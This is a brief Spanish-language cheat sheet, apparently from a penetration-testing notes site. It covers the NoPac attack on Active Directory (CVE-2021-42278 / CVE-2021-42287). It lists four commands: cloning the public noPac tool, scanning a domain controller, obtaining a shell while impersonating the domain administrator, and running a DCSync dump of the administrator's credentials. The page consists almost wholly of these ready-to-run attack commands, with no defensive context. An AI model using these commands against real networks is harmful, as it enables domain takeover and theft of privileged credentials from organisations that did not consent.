NoPac
CVE-2021-42278 / CVE-2021-42287
1) Clonación de repositorio.
git clone https://github.com/Ridter/noPac.git
cd noPac
2) Revisión si el objetivo es vulnerable.
scanner.py <ACME.LOCAL>/<user>:<password> -dc-ip <IP-address-DC> -use-ldap
3) Obtención de shell.
noPac.py <ACME.LOCAL>/<user>:<password> -dc-ip <IP-address-DC> -dc-host <hostname-DC> -shell --impersonate administrator -use-ldap
4) Realización de ataque de DCSync.
noPac.py <ACME.LOCAL>/<user>:<password> -dc-ip <IP-address-DC> -dc-host <hostname-DC> --impersonate administrator -use-ldap -dump -just-dc-user <ACME>/administrator
Última actualización
¿Te fue útil?